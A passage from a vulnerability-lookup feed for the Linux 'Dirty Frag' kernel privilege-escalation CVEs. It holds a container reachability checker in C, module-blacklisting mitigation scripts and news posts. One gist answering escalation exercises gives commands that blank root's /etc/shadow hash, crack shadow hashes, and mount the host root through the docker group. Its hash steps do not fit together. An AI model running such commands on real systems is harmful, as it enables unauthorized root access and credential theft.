Write-up:  
https://github.com/V4bel/dirtyfrag\");\n    puts(\"  Trigger:   XFRM_MSG_NEWSA over NETLINK_XFRM - requires CAP_NET_ADMIN\");\n    puts(\"             PoC escape: unshare(CLONE_NEWUSER|CLONE_NEWNET) to acquire\");\n    puts(\"             CAP_NET_ADMIN inside a fresh user namespace.\");\n    puts(\"  Distinct:  Two-step attack. Standard hardening (drop ALL caps +\");\n    puts(\"             RuntimeDefault seccomp denying CLONE_NEWUSER) blocks both\");\n    puts(\"             rungs of the ladder.\");\n    putchar('\\n');\n\n    // Module presence: SA registration over NETLINK_XFRM returns EPROTONOSUPPORT\n    // if neither esp4 nor esp6 is loaded, regardless of how reachable the\n    // netlink socket is. Module autoload from inside an unprivileged userns\n    // is blocked, so userspace can't fix this.\n    bool esp4 = module_loaded(\"esp4\");\n    bool esp6 = module_loaded(\"esp6\");\n    bool esp_present = esp4 || esp6;\n\n    const char *unshare_err = try_unshare(CLONE_NEWUSER | CLONE_NEWNET);\n    bool netlink_ok = false;\n    const char *netlink_err = NULL;\n    if (unshare_err == NULL) {\n        int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);\n        if (s >= 0) { close(s); netlink_ok = true; }\n        else        { netlink_err = strerror(errno); }\n    }\n\n    bool reachable = netlink_ok && esp_present;\n\n    if (reachable) {\n        puts(\"  Reachability: REACHABLE - SA registration would succeed\");\n    } else if (!esp_present) {\n        puts(\"  Reachability: blocked - esp4.ko/esp6.ko not loaded on node\");\n        puts(\"                (NETLINK_XFRM socket may be reachable but SA\");\n        puts(\"                 registration returns EPROTONOSUPPORT)\");\n    } else if (unshare_err != NULL) {\n        printf(\"  Reachability: blocked at unshare(CLONE_NEWUSER|CLONE_NEWNET) - %s\\n\",\n               unshare_err);\n    } else {\n        printf(\"  Reachability: userns OK but NETLINK_XFRM blocked (%s)\\n\", netlink_err);\n    
}\n\n    char max_un[64], capeff[64], seccomp[64], nnp[64];\n    char unprivuserns[64], lsm[256], uidmap[256];\n    cat(\"/proc/sys/user/max_user_namespaces\", max_un, sizeof(max_un));\n    cat(\"/proc/sys/kernel/unprivileged_userns_clone\", unprivuserns, sizeof(unprivuserns));\n    cat(\"/proc/self/attr/current\", lsm, sizeof(lsm));\n    cat(\"/proc/self/uid_map\", uidmap, sizeof(uidmap));\n    proc_status_field(\"CapEff\",  capeff,  sizeof(capeff));\n    proc_status_field(\"Seccomp\", seccomp, sizeof(seccomp));\n    proc_status_field(\"NoNewPrivs\", nnp, sizeof(nnp));\n\n    putchar('\\n');\n    puts(\"  Why (which layer blocks):\");\n    printf(\"    esp4.ko loaded on node:                        %s\\n\", tf(esp4));\n    printf(\"    esp6.ko loaded on node:                        %s\\n\", tf(esp6));\n    printf(\"    Seccomp:                                       %s  (2 = filter active)\\n\", seccomp);\n    printf(\"    NoNewPrivs:                                    %s\\n\", nnp);\n    printf(\"    CapEff:                                        %s  (0 = no caps)\\n\", capeff);\n    printf(\"    /proc/sys/user/max_user_namespaces:            %s\\n\", max_un);\n    printf(\"    /proc/sys/kernel/unprivileged_userns_clone:    %s\\n\", unprivuserns);\n    printf(\"    AppArmor/SELinux (/proc/self/attr/current):    %s\\n\", lsm);\n    printf(\"    uid_map (in initial userns?):                  %s\\n\", uidmap);\n\n    putchar('\\n');\n    puts(\"  Per-flag unshare (distinguishes cap check from seccomp):\");\n    struct { int flag; const char *label; } flags[] = {\n        { CLONE_NEWUSER, \"CLONE_NEWUSER\" },\n        { CLONE_NEWNET,  \"CLONE_NEWNET\"  },\n        { CLONE_NEWNS,   \"CLONE_NEWNS\"   },\n        { CLONE_NEWPID,  \"CLONE_NEWPID\"  },\n    };\n    for (size_t i = 0; i < sizeof(flags)/sizeof(flags[0]); i++) {\n        const char *e = try_unshare(flags[i].flag);\n        printf(\"    unshare(%-14s): %s\\n\", flags[i].label, e ? 
e : \"OK\");\n    }\n\n    result_t r = { .cve = \"CVE-2026-43284 xfrm-ESP\" };\n    if (reachable) {\n        r.verdict = \"EXPLOITABLE\";\n        snprintf(r.why, sizeof(r.why),\n                 \"userns + NETLINK_XFRM reachable AND esp module loaded\");\n    } else if (!esp_present) {\n        r.verdict = \"NOT EXPLOITABLE\";\n        snprintf(r.why, sizeof(r.why),\n                 \"neither esp4 nor esp6 module loaded on node \"\n                 \"(no ESP handler registered)\");\n    } else if (unshare_err == NULL && netlink_err != NULL) {\n        r.verdict = \"NOT EXPLOITABLE\";\n        snprintf(r.why, sizeof(r.why),\n                 \"userns ok but NETLINK_XFRM socket blocked\");\n    } else {\n        r.verdict = \"NOT EXPLOITABLE\";\n        long max_un_n = strtol(max_un, NULL, 10);\n        if (max_un_n == 0) {\n            snprintf(r.why, sizeof(r.why),\n                     \"kernel sysctl forbids user namespace creation\");\n        } else {\n            snprintf(r.why, sizeof(r.why),\n                     \"seccomp denies user namespace creation, caps dropped\");\n        }\n    }\n    return r;\n}\n\n// ---------- main ----------\n\nint main(void) {\n    puts(\"Dirty Frag CVE reachability + diagnostic check\");\n    puts(\"Run from inside the container under test. 
Read-only, non-destructive.\");\n\n    result_t rxrpc = check_rxrpc();\n    result_t xfrm  = check_xfrm();\n\n    section(\"Summary\");\n    printf(\"  %s - %s - %s\\n\", rxrpc.verdict, rxrpc.cve, rxrpc.why);\n    printf(\"  %s - %s - %s\\n\", xfrm.verdict,  xfrm.cve,  xfrm.why);\n\n    putchar('\\n');\n    puts(\"------ copy-paste summary ------\");\n    printf(\"%s - %s - %s\\n\", rxrpc.verdict, rxrpc.cve, rxrpc.why);\n    printf(\"%s - %s - %s\\n\", xfrm.verdict,  xfrm.cve,  xfrm.why);\n    puts(\"--------------------------------\");\n\n    return 0;\n}", "creation_timestamp": "2026-05-09T17:43:07.000000Z"}, {"uuid": "7f83777f-2c93-4368-b240-c8007147b7c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/bottiger1/83d95b500a135a7283504995082a87dd", "content": "#!/usr/bin/env bash\n# CVE-2026-31431 (Copy Fail) | CVE-2026-43284 / CVE-2026-43500 (Dirty Frag)\nset -euo pipefail\n\nRED='\\033[0;31m'; YEL='\\033[1;33m'; GRN='\\033[0;32m'; NC='\\033[0m'\nok()   { echo -e \"  [${GRN}OK${NC}]   $*\"; }\nwarn() { echo -e \"  [${YEL}WARN${NC}] $*\"; }\nerr()  { echo -e \"  [${RED}FAIL${NC}] $*\"; }\n\nCONF=\"/etc/modprobe.d/dirtyfrag.conf\"\nMODS=(algif_aead esp4 esp6 rxrpc)\n\n[[ $EUID -eq 0 ]] || { err \"Run as root\"; exit 1; }\n\nprintf 'install %s /bin/false\\n' \"${MODS[@]}\" > \"$CONF\"\nok \"Wrote $CONF\"\n\nfor mod in \"${MODS[@]}\"; do\n    if lsmod | grep -q \"^${mod} \"; then\n        rmmod \"$mod\" 2>/dev/null && ok \"Unloaded $mod\" || warn \"Could not unload $mod \u2014 reboot needed\"\n    else\n        ok \"Not loaded: $mod\"\n    fi\ndone\n\necho -e \"\\nVerification:\"\nall_ok=true\nfor mod in \"${MODS[@]}\"; do\n    grep -q \"install ${mod} /bin/false\" \"$CONF\" 2>/dev/null \\\n        && ok \"Blocked: $mod\" || { err \"Rule missing: $mod\"; all_ok=false; }\n    lsmod | 
grep -q \"^${mod} \" \\\n        && { warn \"Still loaded: $mod \u2014 reboot required\"; all_ok=false; }\ndone\n\n$all_ok && echo -e \"\\n${GRN}\u2714 Done.${NC}\" || echo -e \"\\n${YEL}\u26a0 Reboot to complete.${NC}\"", "creation_timestamp": "2026-05-09T20:54:35.000000Z"}, {"uuid": "cdff8284-6671-41b6-b447-d4965cf92e62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/0xdf.bsky.social/post/3mlhbvqwflc2b", "content": "Diving into Dirty Frag, the second Linux page-cache local privesc in two weeks. CVE-2026-43284 + CVE-2026-43500 provide full distro coverage. \n\nI walk through both variants, the broken disclosure, and demo both versions on the HTB Snapped machine.\n\nwww.youtube.com/watch?v=B5eU...", "creation_timestamp": "2026-05-09T22:23:46.880671Z"}, {"uuid": "7c363ca8-5b77-46bc-b3cc-4dd368c9d637", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/83571", "content": "\ud83d\udea8 GitHub monitoring alert\n\n\ud83d\udea8 Keyword found: #CVE-2026\n\n\ud83d\udce6 Project name: DIRTY-FRAG-Detection-with-Wazuh-4.14.4\n\ud83d\udc64 Project author: mym0us3r\n\ud83d\udee0 Language: None\n\u2b50 Stars: 1  |  \ud83c\udf74 Forks: 0\n\ud83d\udcc5 Updated: 2026-05-09 23:58:50\n\n\ud83d\udcdd Project description:\nWazuh 4.14.4 detection rules for CVE-2026-43284 / CVE-2026-43500 (Dirty Frag) - Linux Local Privilege Escalation via page cache write\n\n\ud83d\udd17 Click to open the project page", "creation_timestamp": "2026-05-10T00:00:04.000000Z"}, {"uuid": 
"5a6d94ee-ea4d-4a99-bc3c-04b86bc2a102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlhpojezmi2z", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 164 interactions\nCVE-2026-43284: 120 interactions\nCVE-2026-43500: 84 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-43284: 59 interactions\nCVE-2026-43500: 53 interactions\nCVE-2026-31431: 14 interactions\n", "creation_timestamp": "2026-05-10T02:30:15.765128Z"}, {"uuid": "652fa8a1-064b-4c19-865b-d2cd05126b98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/83624", "content": "\ud83d\udea8 GitHub monitoring alert\n\n\ud83d\udea8 Keyword found: #CVE-2026\n\n\ud83d\udce6 Project name: CVE-2026-43500\n\ud83d\udc64 Project author: attaattaatta\n\ud83d\udee0 Language: Go\n\u2b50 Stars: 0  |  \ud83c\udf74 Forks: 0\n\ud83d\udcc5 Updated: 2026-05-10 07:57:52\n\n\ud83d\udcdd Project description:\nCVE-2026-43500 / CVE-2026-31431 / CVE-2026-43284 golang hotfix\n\n\ud83d\udd17 Click to open the project page", "creation_timestamp": "2026-05-10T08:00:04.000000Z"}, {"uuid": "141811cf-cbb0-4ed8-9eb6-efd400fc570d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/adhisimon.kodesumber.com.ap.brid.gy/post/3mlfklfop3ar2", "content": "After #CopyFail comes #DirtyFrag\n\n  * CVE-2026-43284\n  * CVE-2026-43500\n\n\n\nHaven't tried the _poc_ yet, but 
it looks simple too.\n\nhttps://github.com/V4bel/dirtyfrag/blob/master/README.md\n\n#linux #cve #infosec", "creation_timestamp": "2026-05-09T05:53:43.381376Z"}, {"uuid": "166d486e-f1e6-4005-b1a1-579464e93565", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/devops-daily.com/post/3mlfocj5dyv2s", "content": "\ud83d\udcdd Dirty Frag (CVE-2026-43284 + CVE-2026-43500): Local Root on Every Major Linux Distro\n\nA two-bug chain in the Linux kernel networking subsystems lets any unprivileged local user become root in a single command. The PoC is public, the...\n\nRead here: https://devops-daily.com/posts/dirty-frag-cve-...", "creation_timestamp": "2026-05-09T07:00:19.369288Z"}, {"uuid": "149d1d44-f2de-4cb3-8617-b31a33dc6c56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/adriend.linuxtricks.fr/post/3mlfqadh76s2h", "content": "Excellent article in French on the Dirty Frag flaw, aka the pair CVE-2026-43284 and CVE-2026-43500!\nI highly recommend reading it!\n\nblog.marcfredericgomez.fr/dirty-frag-c...\n\n#Linux #LPE #DirtyFrag", "creation_timestamp": "2026-05-09T07:34:52.300689Z"}, {"uuid": "088c27b5-531f-424e-81ac-968932cfc5b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3mlfxag26os2y", "content": "Dirty Frag (CVE-2026-43284 and CVE-2026-43500) blog.marcfredericgomez.fr/dirty-frag-c...", "creation_timestamp": "2026-05-09T09:40:13.065775Z"}, {"uuid": "4cb38d89-9130-4097-b2de-a42eb0a2f7fd", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mlijoq3ck42w", "content": "Dirty Frag: New Linux Page-Cache Local PrivEsc Chain (CVE-2026-43284 & CVE-2026-43500) \u2013 Full Distro Coverage +\u00a0Video\n\nIntroduction: The Linux kernel\u2019s page cache \u2013 a core performance feature that caches filesystem data in memory \u2013 has become the latest attack surface for local privilege\u2026", "creation_timestamp": "2026-05-10T10:15:39.973736Z"}, {"uuid": "94c6b95b-c552-4ee8-bf6b-8e25fff7826f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/shortinfo.bsky.social/post/3mlitjang6426", "content": "Two newly disclosed Linux kernel flaws named Dirty Frag (CVE-2026-43284 and CVE-2026-43500) can be chained into a single command that grants any user root. Microsoft confirmed active exploitation. One patch is out, the other is pending. 
Ubuntu, Red Hat and Fedora are affected.", "creation_timestamp": "2026-05-10T13:11:35.078559Z"}, {"uuid": "d0745ee1-0906-43a9-8130-e998f2e2cd6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/Senci/6dd521104fd36bf9c679975fb9e8b89c", "content": "#!/usr/bin/env bash\n# Dirty Frag mitigation + verification\n# CVE-2026-43284 (xfrm-ESP) / CVE-2026-43500 (RxRPC)\n# Works on Rocky/RHEL and Arch \u2014 idempotent, no reboot required.\n\nset -euo pipefail\n\nCONF=/etc/modprobe.d/dirtyfrag.conf\nMODS=(esp4 esp6 rxrpc)\n\n[[ $EUID -eq 0 ]] || {\n  echo \"must run as root\" >&2\n  exit 1\n}\n\necho \"=== Dirty Frag mitigation ===\"\necho \"host:   $(hostname)\"\necho \"kernel: $(uname -r)\"\necho\n\n# 1. report whether vulnerable .ko files are present on this kernel\necho \"[1/5] vulnerable modules on disk:\"\nfor m in \"${MODS[@]}\"; do\n  f=$(find \"/lib/modules/$(uname -r)\" -name \"${m}.ko*\" 2>/dev/null | head -1)\n  [[ -n $f ]] && echo \"  - $m: $f\" || echo \"  - $m: not built for this kernel\"\ndone\necho\n\n# 2. write blacklist\necho \"[2/5] writing $CONF\"\ncat >\"$CONF\" <<'EOF'\n# Dirty Frag mitigation \u2014 block xfrm-ESP and RxRPC page-cache-write LPE\n# CVE-2026-43284 (esp4/esp6), CVE-2026-43500 (rxrpc)\n# Remove this file once distro kernel ships backports.\ninstall esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\nEOF\nchmod 0644 \"$CONF\"\n\n# 3. unload anything currently loaded\necho \"[3/5] unloading currently loaded modules:\"\nfor m in \"${MODS[@]}\"; do\n  if lsmod | awk '{print $1}' | grep -qx \"$m\"; then\n    if rmmod \"$m\" 2>/dev/null; then\n      echo \"  - $m: unloaded\"\n    else\n      echo \"  - $m: in use, could not unload (reboot to clear)\"\n    fi\n  else\n    echo \"  - $m: not loaded\"\n  fi\ndone\n\n# 4. 
flush page cache (cleans up if exploit had been run pre-mitigation)\necho \"[4/5] flushing page cache\"\nsync\necho 3 >/proc/sys/vm/drop_caches\necho \"  - done\"\n\n# 5. verify autoload is blocked (dry-run, does not execute /bin/false)\necho\necho \"[5/5] verifying autoload is blocked:\"\nfail=0\nfor m in \"${MODS[@]}\"; do\n  if modprobe -n -v \"$m\" 2>&1 | grep -q '/bin/false'; then\n    echo \"  - $m: BLOCKED \u2713\"\n  else\n    echo \"  - $m: NOT BLOCKED \u2717\"\n    fail=1\n  fi\ndone\n\necho\nif [[ $fail -eq 0 ]]; then\n  echo \"=== mitigation applied successfully \u2014 no reboot required ===\"\n  exit 0\nelse\n  echo \"=== mitigation FAILED \u2014 investigate $CONF and modprobe config ===\"\n  exit 2\nfi\n", "creation_timestamp": "2026-05-08T19:04:16.000000Z"}, {"uuid": "4647b87c-6d98-4691-8ee2-f8c77da23eff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/nicolas17.xyz/post/3mleijak4qk24", "content": "Did you update your Linux kernel *again* to protect against the last privilege escalation bug?\n\nNo, not CopyFail (CVE-2026-31431), the new DirtyFrag (CVE-2026-43284, CVE-2026-43500).", "creation_timestamp": "2026-05-08T19:44:03.845763Z"}, {"uuid": "eca1553c-ef88-4736-8dcf-93729f73a088", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/tryharderhvh/aed5f1a11b1565ae4b921a642bce064b", "content": "Task 1\nGiven: user user, file /etc/shadow, permissions -rw----rw-, owner root, group 
user.\n\nHow Linux checks permissions: it first checks whether the process is the owner; otherwise, whether it is in the file's group; otherwise it applies other. The check stops at the first matching category, even if its bits are stricter than other.\n\nApplied to user:\n- Owner? No, the owner is root.\n- In group user? Yes, it is the user's own primary group (the User Private Group scheme, the default in Debian/Ubuntu/RHEL/Fedora). 
The task statement implies this: the user name matching the file's group name points to UPG. If the system were non-UPG and user were not in group user, the check would fall through to other \u2192 rw- \u2192 access would be granted. All further conclusions for Task 1 rest on the UPG assumption.\n- The group bits apply: --- \u2192 no access.\n\nThe rw- bits from other are unreachable because the kernel stops at the group match.\n\nAnswer: privileges cannot be escalated directly 
through /etc/shadow in this configuration. open(O_RDONLY) and open(O_WRONLY) will return EACCES.\n\nBypass attempts and why they do not work:\n- newgrp / sg: change only the primary GID; supplementary membership in user is retained.\n- setgroups(0, NULL) and setpriv --clear-groups: require CAP_SETGID, which an unprivileged user does not have.\n- User namespaces (unshare -Urm): the kernel's DAC check uses kuid/kgid and does not recompute them under the user-namespace mapping. 
Dropping supplementary groups is not possible either: for an unprivileged userns the kernel forces /proc/PID/setgroups=deny, so setgroups(0, NULL) inside the namespace will not work. Group user stays in the credentials \u2192 in_group_p() returns true \u2192 the group bits --- apply \u2192 access is denied.\n- Bind mount, hardlink, copying: do not change the permissions of the original inode and themselves require read access.\n\nAssumption: there is no POSIX ACL on /etc/shadow. A named-user ACL is evaluated before group/other, so an entry like `user:user:rw-` would override the empty group bits and grant access. 
The task statement does not mention ACLs, so we assume there are none. On a real system, check `getfacl /etc/shadow`.\n\nCaveat about a vector that bypasses /etc/shadow. The conclusion \"root cannot be obtained through these permissions\" is correct only for the DAC plane. At the kernel level, Dirty Frag was published on 7-8 May 2026: a chain of CVE-2026-43284 (esp4/esp6) and CVE-2026-43500 (rxrpc): in-place decryption fast paths decrypt over paged skb fragments to which an unprivileged process still holds a reference, which gives a write to kernel-side pages and LPE to root with a single command 
on all major distros (Ubuntu, RHEL, AlmaLinux, CloudLinux). The regression has been in xfrm-ESP since 2017 and in RxRPC since 2023. As of 8 May a patch was out only for 43284, not for 43500; the temporary mitigation is to block module loading (`/etc/modprobe.d/dirtyfrag.conf` with `install esp4|esp6|rxrpc /bin/false` and `rmmod`). This applies to the task in the sense that an attacker with a user shell does not care about the group bits on shadow: he takes root directly through the kernel.\n\nTask 2\nGiven: user user, groups user cdrom vboxusers docker, file /etc/shadow, permissions -rw----rw-, owner root, group adm.\n\nApplied to user:\n- Owner? 
No.\n- In group adm? No, it is not in the list of groups.\n- The other bits apply: rw- \u2192 read and write are allowed.\n\nAssumption: there is no POSIX ACL on /etc/shadow. A named-user ACL `user:user:---` would be evaluated before other and would block access. The mask (ACL_MASK) does not affect other: the mask applies only to named-user, owning-group and named-group entries. The task statement does not mention ACLs, so we assume there are none. 
On a real system, check `getfacl /etc/shadow`.\n\nAnswer: privileges can be escalated, and by two independent paths\n\nPath 1: through the permissions on /etc/shadow. The user can overwrite root's hash field:\n1. Generate a hash: openssl passwd -6 'NewPass'\n2. Replace the hash: sed -i \"s|^root:[^:]*:|root::|\" /etc/shadow\n3. su - and log in as root with the chosen password\nAlternative: read shadow, combine it with /etc/passwd using unshadow and crack it with john/hashcat (quieter, no writes)\n\nPath 2: through the docker group. 
Membership in docker is equivalent to root: the daemon runs as root, and any member of the group controls it through the socket. The command docker run --rm -it -v /:/mnt alpine chroot /mnt sh gives a root shell on the host without touching /etc/shadow.\n\nSummary: in task 2 escalation is trivial in at least two ways.\n", "creation_timestamp": "2026-05-10T17:36:51.000000Z"}, {"uuid": "8746c2d9-6134-4649-a0f5-9fc2f7454455", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mljr5rhd6i22", "content": "Dirty Frag (CVE-2026-43284, CVE-2026-43500): Frequently asked questions about this Linux kernel privilege escalation vulnerability chain Weeks after the Copy Fail vulnerability was revealed, a new ...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-10T22:02:05.829577Z"}, {"uuid": "dd2b415a-c654-4068-9568-ee5f825f1e16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": 
"https://bsky.app/profile/securitylab-jp.bsky.social/post/3mljujvcrks2a", "content": "Linux kernel vulnerability Dirty Frag allows root takeover (CVE-2026-43284, CVE-2026-43500)\n\nrocket-boys.co.jp/security-mea...\n\n#\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5bfe\u7b56Lab #security #securitynews", "creation_timestamp": "2026-05-10T23:02:32.169777Z"}, {"uuid": "3e0a8ccc-4080-4cfc-bde5-bbc4e36355b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mlk7psdid6r2", "content": "Dirty Frag (CVE-2026-43284, CVE-2026-43500): Mitigation and Kernel Update on CloudLinux A week after Copy Fail (CVE-2026-31431), researcher Hyunwoo Kim disclosed a second Linux kernel local privil...\n\n#KernelCare #CVE #Vulnerability #Kernel #Update #AlmaLinux #CloudLinux\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-11T02:22:41.621990Z"}, {"uuid": "b7727347-729f-4cea-bbe5-0cc83d7055e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlka652tl522", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 141 interactions\nCVE-2026-43284: 122 interactions\nCVE-2026-43500: 84 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-42511: 56 interactions\nCVE-2024-13362: 4 interactions\nCVE-2026-29201: 3 interactions\n", "creation_timestamp": "2026-05-11T02:30:39.352628Z"}, {"uuid": "a4fe39b7-b5a3-4ae9-95f4-a3f471e7c930", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": 
"https://bsky.app/profile/Linux-Maintainers.activitypub.awakari.com.ap.brid.gy/post/3mleiuxfnowo2", "content": "AL26-011 - Vulnerabilities affecting Linux - CVE-2026-43284 and CVE-2026-43500 Introduction to Malware Binary Triage (IMBT) Course Looking to level up your skills? Get 10% off using coupon code: MW...\n\n#Malware #News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-08T19:50:39.591563Z"}, {"uuid": "47b61115-e966-4893-afa1-7f2d2e8c470f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3mlekajztdm2e", "content": "~Cybergcca~\nAlert on unpatched Linux LPE flaws (Dirty Frag) with active PoCs, plus Edge & cPanel updates.\n-\nIOCs: CVE-2026-43284, CVE-2026-43500\n-\n#Linux #ThreatIntel #Vulnerability", "creation_timestamp": "2026-05-08T20:14:58.760346Z"}, {"uuid": "ddeecb7b-db90-4ab0-8aff-a66fa7ba053f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/mel-echosphere.bsky.social/post/3mlene27n652h", "content": 
"What happens.\n\nA logged-in ordinary user can seize administrator privileges. No luck with timing is needed; it works reliably.\n\nA structural flaw in which the network encryption processing ends up writing directly into someone else's memory region. It remained unnoticed for 9 years after a 2017 code change.\ud83d\udd4a\ufe0f\n\nCVE-2026-43284 is fixed. CVE-2026-43500 has no fix.\n\nDirty Pipe \u2192 Copy Fail \u2192 Dirty Frag. The same kind of hole keeps spreading across generations. Even when one is plugged, it comes back through another path built on the same mechanism.", "creation_timestamp": "2026-05-08T21:10:37.192059Z"}, {"uuid": "601b31b4-bbe3-4b96-96d2-ff36b440c850", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mlenmpi3zb2z", "content": "DirtyFrag exploits two Linux kernel bugs, CVE-2026-43284 and CVE-2026-43500, enabling local root access on major distros including Ubuntu, RHEL, Fedora, CentOS Stream, AlmaLinux, and openSUSE. 
#LinuxRoot #KernelExploit #USA", "creation_timestamp": "2026-05-08T21:15:28.771348Z"}, {"uuid": "5fb5f327-2c4e-4345-9897-d1461d08e967", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mleq4zjrfm2s", "content": "Two Linux kernel vulnerabilities, CVE-2026-43284 and CVE-2026-43500 (Dirty Frag), enable local users to escalate privileges by overwriting page cache across many distros. Monitoring ESP and RxRPC recommended. #LinuxKernel #RootAccess #USA", "creation_timestamp": "2026-05-08T22:00:23.546730Z"}, {"uuid": "4c0bfaf6-c9ee-48fe-9a57-e42078a7463d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/dragostech.bsky.social/post/3mler7ebhyc26", "content": "\"Dirty Frag\" clickbait update: ESP (CVE-2026-43284) patched in mainline + stable (7.0.5, 6.18.28, 6.12.87, 6.6.138, 6.1.171). RxRPC (CVE-2026-43500) still unpatched upstream. AWS adds ipcomp4/ipcomp6 to the blacklist alongside esp4/esp6/rxrpc. AlmaLinux shipped both. 
